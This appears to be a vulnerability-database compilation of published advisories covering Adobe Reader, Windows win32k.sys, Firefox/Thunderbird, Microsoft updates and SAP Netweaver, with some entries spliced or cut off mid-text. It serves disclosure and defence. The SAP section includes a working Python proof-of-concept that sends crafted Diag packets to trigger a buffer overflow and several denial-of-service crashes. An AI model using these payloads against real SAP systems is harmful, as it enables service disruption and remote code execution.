http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0591
[ 15 ] CVE-2011-0592
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0592
[ 16 ] CVE-2011-0593
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0593
[ 17 ] CVE-2011-0594
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0594
[ 18 ] CVE-2011-0595
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0595
[ 19 ] CVE-2011-0596
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0596
[ 20 ] CVE-2011-0598
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0598
[ 21 ] CVE-2011-0599
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0599
[ 22 ] CVE-2011-0600
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0600
[ 23 ] CVE-2011-0602
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0602
[ 24 ] CVE-2011-0603
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0603
[ 25 ] CVE-2011-0604
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0604
[ 26 ] CVE-2011-0605
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0605
[ 27 ] CVE-2011-0606
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0606
[ 28 ] CVE-2011-2130
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130
[ 29 ] CVE-2011-2134
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134
[ 30 ] CVE-2011-2135
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135
[ 31 ] CVE-2011-2136
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136
[ 32 ] CVE-2011-2137
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137
[ 33 ] CVE-2011-2138
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138
[ 34 ] CVE-2011-2139
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139
[ 35 ] CVE-2011-2140
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140
[ 36 ] CVE-2011-2414
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414
[ 37 ] CVE-2011-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415
[ 38 ] CVE-2011-2416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416
[ 39 ] CVE-2011-2417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417
[ 40 ] CVE-2011-2424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424
[ 41 ] CVE-2011-2425
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425
[ 42 ] CVE-2011-2431
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2431
[ 43 ] CVE-2011-2432
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2432
[ 44 ] CVE-2011-2433
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2433
[ 45 ] CVE-2011-2434
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2434
[ 46 ] CVE-2011-2435
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2435
[ 47 ] CVE-2011-2436
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2436
[ 48 ] CVE-2011-2437
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2437
[ 49 ] CVE-2011-2438
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2438
[ 50 ] CVE-2011-2439
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2439
[ 51 ] CVE-2011-2440
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2440
[ 52 ] CVE-2011-2441
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2441
[ 53 ] CVE-2011-2442
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2442
[ 54 ] CVE-2011-2462
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2462
[ 55 ] CVE-2011-4369
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4369
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201201-19.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2012 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
.
I. Description
Adobe Security Bulletin APSB11-30 and Adobe Security Advisory
APSA11-04 describe a number of vulnerabilities affecting Adobe
Reader and Acrobat. These vulnerabilities affect Reader and Acrobat
9.4.6 and earlier 9.x versions. These vulnerabilities also affect
Reader X and Acrobat X 10.1.1 and earlier 10.x versions.
An attacker could exploit these vulnerabilities by convincing a
user to open a specially crafted PDF file. The Adobe Reader browser
plug-in, which can automatically open PDF documents hosted on a
website, is available for multiple web browsers and operating
systems.
Adobe Reader X and Adobe Acrobat X will be patched in the next
quarterly update scheduled for January 10, 2012.
II. Impact
These vulnerabilities could allow a remote attacker to execute
arbitrary code, write arbitrary files or folders to the file
system, escalate local privileges, or cause a denial of service on
an affected system as the result of a user opening a malicious PDF
file.
III. Solution
Update Reader
Adobe has released updates to address this issue. Users are
encouraged to read Adobe Security Bulletin APSB11-30 and update
vulnerable versions of Adobe Reader and Acrobat.
In addition to updating, please consider the following mitigations.
Disable Flash in Adobe Reader and Acrobat
Disabling Flash in Adobe Reader will mitigate attacks that rely on
Flash content embedded in a PDF file. Disabling 3D & Multimedia
support does not directly address the vulnerability, but it does
provide additional mitigation and results in a more user-friendly
error message instead of a crash. To disable Flash and 3D &
Multimedia support in Adobe Reader 9, delete, rename, or remove
access to these files:
Microsoft Windows
"%ProgramFiles%\Adobe\Reader 9.0\Reader\authplay.dll"
"%ProgramFiles%\Adobe\Reader 9.0\Reader\rt3d.dll"
Apple Mac OS X
"/Applications/Adobe Reader 9/Adobe
Reader.app/Contents/Frameworks/AuthPlayLib.bundle"
"/Applications/Adobe Reader 9/Adobe
Reader.app/Contents/Frameworks/Adobe3D.framework"
GNU/Linux (locations may vary among distributions)
"/opt/Adobe/Reader9/Reader/intellinux/lib/libauthplay.so"
"/opt/Adobe/Reader9/Reader/intellinux/lib/librt3d.so"
File locations may be different for Adobe Acrobat or other Adobe
products that include Flash and 3D & Multimedia support. Disabling
these plugins will reduce functionality and will not protect
against Flash content that is hosted on websites. Depending on the
update schedule for products other than Flash Player, consider
leaving Flash and 3D & Multimedia support disabled unless they are
absolutely required. Acrobat JavaScript can be disabled using the
Preferences menu (Edit -> Preferences -> JavaScript; uncheck Enable
Acrobat JavaScript).
Adobe provides a framework to blacklist specific JavaScipt APIs. If
JavaScript must be enabled, this framework may be useful when
specific APIs are known to be vulnerable or used in attacks.
Prevent Internet Explorer from automatically opening PDF files
The installer for Adobe Reader and Acrobat configures Internet
Explorer to automatically open PDF files without any user
interaction. This behavior can be reverted to a safer option that
prompts the user by importing the following as a .REG file:
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\AcroExch.Document.7]
"EditFlags"=hex:00,00,00,00
Disable the display of PDF files in the web browser
Preventing PDF files from opening inside a web browser will
partially mitigate this vulnerability. If this workaround is
applied, it may also mitigate future vulnerabilities.
To prevent PDF files from automatically being opened in a web
browser, do the following:
1.
2. Open the Edit menu.
3. Choose the Preferences option.
4. Choose the Internet section.
5. Uncheck the "Display PDF in browser" checkbox. PDF documents that use the PRC format
for 3D content will continue to function on Windows and Linux
platforms.
To disable U3D support in Adobe Reader 9 on Microsoft Windows,
delete or rename this file:
"%ProgramFiles%\Adobe\Reader 9.0\Reader\plug_ins3d\3difr.x3d"
For Apple Mac OS X, delete or rename this directory:
"/Applications/Adobe Reader 9/Adobe
Reader.app/Contents/Frameworks/Adobe3D.framework"
For GNU/Linux, delete or rename this file (locations may vary among
distributions):
"/opt/Adobe/Reader9/Reader/intellinux/plug_ins3d/3difr.x3d"
File locations may be different for Adobe Acrobat or other Adobe
products or versions.
Do not access PDF files from untrusted sources
Do not open unfamiliar or unexpected PDF files, particularly those
hosted on websites or delivered as email attachments. Please see
Cyber Security Tip ST04-010.
IV. Please send
email to <cert@cert.org> with "TA11-350A Feedback VU#759307" in
the subject.
____________________________________________________________________
For instructions on subscribing to or unsubscribing from this
mailing list, visit <http://www.us-cert.gov/cas/signup.html>.
____________________________________________________________________
Produced 2011 by US-CERT, a government organization.
Terms of use:
<http://www.us-cert.gov/legal.html>
____________________________________________________________________
Revision History
December 16, 2011: Initial release
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)
iQEVAwUBTuuZnz/GkGVXE7GMAQIN8ggAjjQO8LOasl98uasGZW2J5SHfkKr675Mf
ymRzBagFqO9QuId2RvFG2b9nuq5zdqETsrcG1t668wtYLUhBaoLmFXPe/KsDQ9n+
/p9PctVJFmJpV92S3kAHw+u4t1n/Aa/4IdK0oXNBDhkyXrp41F27LY+aQ8FWWuxZ
lL4jXSUQ/gLgb6hOhLjRCsQtEhAcPbX/mPNxl6bACXZaOVZT88fz9M7JXryDiJWO
uuFi3O2GT0Bd3fEsL57U/TSbq8SynadObMSj4/+Q1HmOHcD0L5gzd9/N4M3D1Emg
y7aeUpgycY5eFefY3LVVkb7JkTUbEZHbuNHydFKIJDRlaXBAo+D0QQ==
=rKM4
-----END PGP SIGNATURE-----
VAR-201112-0114 | CVE-2011-5046 | Microsoft Windows 7 Professional 64-bit Service disruption in (DoS) Vulnerabilities |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
The Graphics Device Interface (GDI) in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate user-mode input, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted data, as demonstrated by a large height attribute of an IFRAME element rendered by Safari, aka "GDI Access Violation Vulnerability.". Microsoft Windows 7 Professional 64-bit of kernel-mode Driver win32k.sys Is Apple Safari Service disruption when using ( Memory corruption ) A vulnerability exists that could lead to state and arbitrary code execution.By a third party IFRAME Excessively large height Service operation disruption via attributes ( Memory corruption ) Could be put into a state and execute arbitrary code. Microsoft Windows is prone to a remote memory-corruption vulnerability.
Successful exploits will result in the execution of arbitrary code in the kernel-mode. Failed attempts will cause a denial-of-service condition. ----------------------------------------------------------------------
Secunia is hiring!
Find your next job here:
http://secunia.com/company/jobs/
----------------------------------------------------------------------
TITLE:
Microsoft Windows win32k.sys Memory Corruption Vulnerability
SECUNIA ADVISORY ID:
SA47237
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/47237/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=47237
RELEASE DATE:
2011-12-19
DISCUSS ADVISORY:
http://secunia.com/advisories/47237/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/47237/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=47237
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been discovered in Microsoft Windows, which can
be exploited by malicious people to potentially compromise a user's
system.
The vulnerability is caused due to an error in win32k.sys and can be
exploited to corrupt memory via e.g. a specially crafted web page
containing an IFRAME with an overly large "height" attribute viewed
using the Apple Safari browser.
The vulnerability is confirmed on a fully patched Windows 7
Professional 64-bit. Other versions may also be affected.
SOLUTION:
No effective solution is currently available.
PROVIDED AND/OR DISCOVERED BY:
webDEViL
ORIGINAL ADVISORY:
https://twitter.com/#!/w3bd3vil/status/148454992989261824
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
National Cyber Alert System
Technical Cyber Security Alert TA12-045A
Microsoft Updates for Multiple Vulnerabilities
Original release date: February 14, 2012
Last revised: --
Source: US-CERT
Systems Affected
* Microsoft Windows
* Microsoft Internet Explorer
* Microsoft .NET Framework
* Microsoft Silverlight
* Microsoft Office
* Microsoft Server Software
Overview
There are multiple vulnerabilities in Microsoft Windows, Internet
Explorer, Microsoft .NET Framework, Silverlight, Office, and
Microsoft Server Software. Microsoft has released updates to
address these vulnerabilities.
I. Description
The Microsoft Security Bulletin Summary for February 2012 describes
multiple vulnerabilities in Microsoft Windows. Microsoft has
released updates to address the vulnerabilities.
II. Impact
A remote, unauthenticated attacker could execute arbitrary code,
cause a denial of service, or gain unauthorized access to your
files or system.
III. Solution
Apply updates
Microsoft has provided updates for these vulnerabilities in the
Microsoft Security Bulletin Summary for February 2012, which
describes any known issues related to the updates. Administrators
are encouraged to note these issues and test for any potentially
adverse effects. In addition, administrators should consider using
an automated update distribution system such as Windows Server
Update Services (WSUS). Home users are encouraged to enable
automatic updates.
IV. References
* Microsoft Security Bulletin Summary for February 2012 -
<https://technet.microsoft.com/en-us/security/bulletin/ms12-feb>
* Microsoft Windows Server Update Services -
<http://technet.microsoft.com/en-us/wsus/default.aspx>
* Microsoft Update - <https://www.update.microsoft.com/>
* Microsoft Update Overview -
<http://www.microsoft.com/security/updates/mu.aspx>
* Turn Automatic Updating On or Off -
<http://windows.microsoft.com/en-us/windows-vista/Turn-automatic-updating-on-or-off>
____________________________________________________________________
The most recent version of this document can be found at:
<http://www.us-cert.gov/cas/techalerts/TA12-045A.html>
____________________________________________________________________
Feedback can be directed to US-CERT Technical Staff. Please send
email to <cert@cert.org> with "TA12-045A Feedback VU#752838" in
the subject.
____________________________________________________________________
For instructions on subscribing to or unsubscribing from this
mailing list, visit <http://www.us-cert.gov/cas/signup.html>.
____________________________________________________________________
Produced 2012 by US-CERT, a government organization.
Terms of use:
<http://www.us-cert.gov/legal.html>
____________________________________________________________________
Revision History
February 14, 2012: Initial release
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)
iQEVAwUBTzqp2T/GkGVXE7GMAQKh6wgAg9gjZ3sCu3eepRZEyFy4PkGhC4A1jzgw
2soH7tPOimgpzlLVbkJ7/RQYylCYixzEa9PbL9v/RzXh/TVVeXrPU97SqmLOAXr7
gtgcapZBGSHBmqYF5BWRnXVRVOQv+JpmdA5AJHO89qQl4okr9VVTCTnQkrAFyzfP
40uf/Nr0DrTRI9dmEjsLTzvOhh0G2HKnBmbpybGaOqoQao67ih/HEOkp6bsCUBwK
joX4C3nK9EdMPNK8YAzrHNbM0ANR5DfieGXBsCwNi6/3zZvGB+PKhAu6bikbQrXW
iRpyS3IirvDB59KNlmQp3jdaodNHSLOg5JuF7kOdQ1m8qa+DjwSvJQ==
=E3Fg
-----END PGP SIGNATURE-----
VAR-201112-0037 | CVE-2011-3666 | Mac OS X Run on Mozilla Firefox and Thunderbird Vulnerable to access restrictions |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Mozilla Firefox before 3.6.25 and Thunderbird before 3.1.17 on Mac OS X do not consider .jar files to be executable files, which allows user-assisted remote attackers to bypass intended access restrictions via a crafted file. NOTE: this vulnerability exists because of an incorrect fix for CVE-2011-2372 on Mac OS X. Mozilla Firefox and Thunderbird are prone to a remote code-execution vulnerability.
An attacker could exploit this issue to execute arbitrary code in the context of the user running an affected application. Failed attempts could lead to a denial-of-service condition. Firefox is a very popular open source web browser. Thunderbird is an email client that supports IMAP, POP email protocols, and HTML email formats
VAR-201112-0034 | CVE-2011-3664 | Mac OS X Multiple running on Mozilla Service disruption in products (DoS) Vulnerabilities |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Mozilla Firefox before 9.0, Thunderbird before 9.0, and SeaMonkey before 2.6 on Mac OS X do not properly handle certain DOM frame deletions by plugins, which allows remote attackers to cause a denial of service (incorrect pointer dereference and application crash) or possibly have unspecified other impact via a crafted web site. Mozilla Firefox is prone to a denial-of-service vulnerability because of a NULL-pointer dereference.
Successful exploits may allow remote attackers to cause denial-of-service conditions. Given the nature of this issue attackers may also be able to run arbitrary code, but this has not been confirmed.
This issue is fixed in:
Firefox 9.0
Thunderbird 9.0
SeaMonkey 2.6. Firefox is a very popular open source web browser. Thunderbird is an email client that supports IMAP, POP email protocols, and HTML email formats. SeaMonkey is an open source web browser, mail and newsgroup client, IRC session client, and HTML editor. ----------------------------------------------------------------------
Secunia is hiring!
Find your next job here:
http://secunia.com/company/jobs/
----------------------------------------------------------------------
TITLE:
Mozilla Firefox / Thunderbird Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA47302
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/47302/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=47302
RELEASE DATE:
2011-12-21
DISCUSS ADVISORY:
http://secunia.com/advisories/47302/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/47302/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=47302
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Mozilla Firefox and
Thunderbird, where one has an unknown impact and others can be
exploited by malicious people to disclose sensitive information and
compromise a user's system.
1) Some unspecified errors can be exploited to corrupt memory. No
further information is currently available.
2) An error exists within the YARR regular expression library when
parsing javascript content.
3) An error within the SVG implementation when SVG elements are
removed during a DOMAttrModified event can be exploited to cause an
out-of-bounds memory access.
4) The application does not properly handle SVG animation accessKey
events when JavaScript is disabled. This can lead to the user's key
strokes being leaked.
5) An error within the plugin handler when deleting DOM frame can be
exploited to dereference memory.
NOTE: This vulnerability only affects Mac OS X.
6) An error exists within the handling of OGG <video> elements.
Successful exploitation of vulnerabilities #1 - #3 and #5 may allow
execution of arbitrary code.
SOLUTION:
Upgrade to version 9.0.
PROVIDED AND/OR DISCOVERED BY:
The vendor credits:
1) Alexandre Poirot, Chris Blizzard, Kyle Huey, Scoobidiver,
Christian Holler, David Baron, Gary Kwong, Jim Blandy, Bob Clary,
Jesse Ruderman, Marcia Knous, and Rober Longson
2) Aki Helin
3) regenrecht via ZDI
4) Mario Heiderich
5) Richard Bateman
6) sczimmer
ORIGINAL ADVISORY:
Mozilla:
http://www.mozilla.org/security/announce/2011/mfsa2011-53.html
http://www.mozilla.org/security/announce/2011/mfsa2011-54.html
http://www.mozilla.org/security/announce/2011/mfsa2011-55.html
http://www.mozilla.org/security/announce/2011/mfsa2011-56.html
http://www.mozilla.org/security/announce/2011/mfsa2011-57.html
http://www.mozilla.org/security/announce/2011/mfsa2011-58.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-201111-0111 | CVE-2011-1516 |
Apple Mac OS X Network resource access vulnerability
Related entries in the VARIoT exploits database: VAR-E-201111-0155, VAR-E-201111-0153, VAR-E-201111-0154 |
CVSS V2: 7.6 CVSS V3: - Severity: HIGH |
The kSBXProfileNoNetwork and kSBXProfileNoInternet sandbox profiles in Apple Mac OS X 10.5.x through 10.7.x do not propagate restrictions to all created processes, which allows remote attackers to access network resources via a crafted application, as demonstrated by use of osascript to send Apple events to the launchd daemon, a related issue to CVE-2008-7303.
An attacker can exploit this issue to bypass certain security restrictions and gain access to restricted functionality.
Apple Mac OS X 10.5.x, 10.6.x and 10.7.x are vulnerable; other versions may also be affected. Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/
SAP Netweaver Dispatcher Multiple Vulnerabilities
1. *Advisory Information*
Title: SAP Netweaver Dispatcher Multiple Vulnerabilities
Advisory ID: CORE-2012-0123
Advisory URL:
http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities
Date published: 2012-05-08
Date of last update: 2012-05-08
Vendors contacted: SAP
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Buffer overflow [CWE-119]
Impact: Code execution, Denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512,
CVE-2012-2513, CVE-2012-2514
3. *Vulnerability Description*
SAP Netweaver [1] is a technology platform for building and integrating
SAP business applications. Multiple vulnerabilities have been found in
SAP Netweaver that could allow an unauthenticated, remote attacker to
execute arbitrary code and lead to denial of service conditions. The
vulnerabilities are triggered sending specially crafted SAP Diag packets
to remote TCP port 32NN (being NN the SAP system number) of a host
running the "Dispatcher" service, part of SAP Netweaver Application
Server ABAP. By sending different messages, the different
vulnerabilities can be triggered.
4. *Vulnerable packages*
. SAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313). SAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869). Older versions are probably affected too, but they were not checked.
5. *Non-vulnerable packages*
. Vendor did not provide this information.
6. *Vendor Information, Solutions and Workarounds*
SAP released the security note
https://service.sap.com/sap/support/notes/1687910 regarding these
issues. Contact SAP for further information.
Martin Gallo proposed the following actions to mitigate the impact of
the vulnerabilities:
1. Disable work processes' Developer Traces for the 'Dialog
Processing' component (for the vulnerabilities [CVE-2011-1516],
[CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]).
2. Restrict access to the Dispatcher service's TCP ports (3200/3299)
(for all vulnerabilities).
3. Restrict access to the work process management transactions
SM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the
vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and
[CVE-2012-2512]).
7. *Credits*
These vulnerabilities were discovered and researched by Martin Gallo
from
http://www.coresecurity.com/content/services-overview-core-security-consulting-services.
The publication of this advisory was coordinated by Fernando Miranda
from http://www.coresecurity.com/content/corelabs-advisories .
8. *Technical Description / Proof of Concept Code*
*NOTE:* (The tracing of 'Dialog processing' has to be in level 2 or 3 in
order to exploit flaws [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511]
and [CVE-2012-2512]).
The following python script can be used to reproduce the vulnerabilities
described below:
/-----
import socket, struct
from optparse import OptionParser
# Parse the target options
parser = OptionParser()
parser.add_option("-l", "--hostname", dest="hostname", help="Hostname",
default="localhost")
parser.add_option("-p", "--port", dest="port", type="int", help="Port
number", default=3200)
(options, args) = parser.parse_args()
def send_packet(sock, packet):
packet = struct.pack("!I", len(packet)) + packet
sock.send(packet)
def receive(sock):
length = sock.recv(4)
(length, ) = struct.unpack("!I", length)
data = ""
while len(data)<length:
data+= sock.recv(length)
return (length, data)
def initialize(sock):
diagheader = "\x00\x10\x00\x00\x00\x00\x00\x00"
user_connect =
"\x10\x04\x02\x00\x0c\x00\x00\x00\xc8\x00\x00\x04\x4c\x00\x00\x0b\xb8"
support_data = "\x10\x04\x0b\x00\x20"
support_data+=
"\xff\x7f\xfa\x0d\x78\xb7\x37\xde\xf6\x19\x6e\x93\x25\xbf\x15\x93"
support_data+=
"\xef\x73\xfe\xeb\xdb\x51\xed\x01\x00\x00\x00\x00\x00\x00\x00\x00"
dpheader =
"\xff\xff\xff\xff\x0a\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
dpheader+= struct.pack("I", len(diagheader + user_connect +
support_data))
dpheader+=
"\x00\xff\xff\xff\xff\xff\xff "
dpheader+= "terminalXXXXXXX"
dpheader+=
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
send_packet(sock, dpheader + diagheader + user_connect + support_data)
def send_message(sock, message):
diagheader = "\x00\x00\x00\x00\x00\x00\x00\x00"
step = "\x10\x04\x26\x00\x04\x00\x00\x00\x01"
eom = "\x0c"
send_packet(sock, diagheader + step + message + eom)
# Connect and send initialization packet
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((options.hostname, options.port))
initialize(connection)
receive(connection)
-----/
In the following subsections, we give the python code that can be added
after the script above in order to reproduce all vulnerabilities.
8.1. *SAP Netweaver DiagTraceR3Info Vulnerability*
[CVE-2011-1516] The vulnerability can be triggered when SAP Netweaver
'disp+work.exe' module process a specially crafted network packet.
Malicious packets are processed by the vulnerable function
'DiagTraceR3Info' in the 'disp+work.exe' module when the Developer Trace
is configured at levels 2 or 3 for the "Dialog processor" component of
the "Dialog" work process handling the packet [2]. This vulnerability
could allow a remote unauthenticated attacker to execute arbitrary code
with the privileges of the user running the "Dispatcher" service. The
following python code can be used to trigger the vulnerability:
/-----
crash = "X"*114 + "\xff\xff" # --> Unicode Address to call !
crash+= "Y"*32
crash = "\x10\x06\x20" + struct.pack("!H", len(crash)) + crash
send_message(connection, crash)
-----/
8.2. *SAP Netweaver DiagTraceHex Denial of Service Vulnerability*
[CVE-2011-1517] The vulnerability can be triggered by sending a
specially crafted network packet to the vulnerable function
'DiagTraceHex' in the 'disp+work.exe'. This vulnerability could allow a
remote unauthenticated attacker to conduct a denial of service attack
against the vulnerable systems. The following python code can be used to
trigger the vulnerability:
/-----
crash = "\x12\x04\x18\xff\xff\xff\xffCrash!"
send_message(connection, crash)
-----/
8.3. *SAP Netweaver DiagTraceAtoms Denial of Service Vulnerability*
[CVE-2012-2511] The vulnerability can be triggered by sending a
specially crafted network packet to the vulnerable function
'DiagTraceAtoms'. This vulnerability could allow a remote
unauthenticated attacker to conduct a denial of service attack. The
following python code can be used to trigger the vulnerability:
/-----
crash = "\x12\x09\x02\x00\x00\x00\x08" + "\x80"*8
send_message(connection, crash)
-----/
8.4. *SAP Netweaver DiagTraceStreamI Denial of Service Vulnerability*
[CVE-2012-2512] The vulnerability can be triggered by sending a
specially crafted network packet to the vulnerable function
'DiagTraceStreamI' and could allow a remote unauthenticated attacker to
conduct a denial of service attack.
/-----
crash = "\x10\x13\x09\x00\xFF\x12\x1A\x59\x51"
send_message(connection, crash)
-----/
8.5. *SAP Netweaver Diaginput Denial of Service Vulnerability*
[CVE-2012-2513] The vulnerability can be triggered by the vulnerable
function 'Diaginput', allowing a denial of service attack against the
vulnerable systems.
/-----
crash = "\x10\x0c\x0e\x00\0a" + "A"*10
send_message(connection, crash)
-----/
8.6. *SAP Netweaver DiagiEventSource Denial of Service Vulnerability*
[CVE-2012-2514] The vulnerability can be triggered by the vulnerable
function 'DiagiEventSource' in the 'disp+work.exe' module. This
